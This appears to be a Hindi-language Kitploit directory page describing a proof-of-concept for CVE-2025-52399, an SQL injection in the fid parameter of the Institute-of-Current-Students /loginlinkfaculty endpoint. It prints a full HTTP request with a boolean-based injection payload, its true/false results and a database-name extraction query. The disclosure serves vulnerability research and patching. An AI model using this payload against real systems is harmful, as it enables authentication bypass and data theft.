Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-52399-SQLi-Institute-of-Current-Students — CVE-2025-52399 के लिए प्रमाण-अवधारणा शोषण, Institute-of-Current-Students के loginlinkfaculty एंडपॉइंट में SQL इंजेक्शन का प्रदर्शन, प्रमाणीकरण बायपास और डेटा निष्कर्षण सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/userr404/cve-2025-52399-sqli-institute-of-current-students
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षा
GitHubuserr404/cve-2025-52399-sqli-institute-of-current-students

CVE-2025-52399-SQLi-Institute-of-Current-Students

CVE-2025-52399 के लिए प्रमाण-अवधारणा शोषण, Institute-of-Current-Students के loginlinkfaculty एंडपॉइंट में SQL इंजेक्शन का प्रदर्शन, प्रमाणीकरण बायपास और डेटा निष्कर्षण सक्षम करता है।

रिपॉजिटरी देखें
1511 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-52399 - वर्तमान छात्र संस्थान में SQL इंजेक्शन

सारांश

Institute-of-Current-Students एप्लिकेशन में loginlinkfaculty एंडपॉइंट fid POST पैरामीटर के माध्यम से SQL इंजेक्शन के प्रति संवेदनशील है। SQL क्वेरी में उपयोग करने से पहले पैरामीटर को ठीक से स्वच्छ नहीं किया जाता, जिससे दूरस्थ हमलावर मनमानी SQL कमांड निष्पादित कर सकते हैं।

  • भेद्यता प्रकार: SQL इंजेक्शन
  • प्रभावित घटक: /loginlinkfaculty (POST)
  • प्रभावित पैरामीटर: fid
  • प्रमाणीकरण: आवश्यक नहीं
  • प्रभाव: प्रमाणीकरण बाईपास, डेटा निष्कर्षण
  • परीक्षण किया गया: लोकलहोस्ट
  • डेटाबेस: icsnew
  • संस्करण: 1.0

PoC

HTTP अनुरोध

root@kitploit:~
POST /Institute-of-Current-Students/loginlinkfaculty HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded fid=-1'+OR+3*2*1=6+AND+000942=000942--&pass=example

पेलोड परिणाम

✅ -1' OR 3*2*1=6 AND 000942=000942 -- → सत्य ❌ -1' OR 2*3=4 AND 000942=000942 -- → असत्य

डेटाबेस निष्कर्षण

SELECT database(); -- returns 'icsnew'

संदर्भ

  • CVE-2025-52399 (MITRE)
  • संवेदनशील एप्लिकेशन
  • OWASP SQL इंजेक्शन

खोजकर्ता

Isroil Mustafoqulov

टूल डाउनलोड करें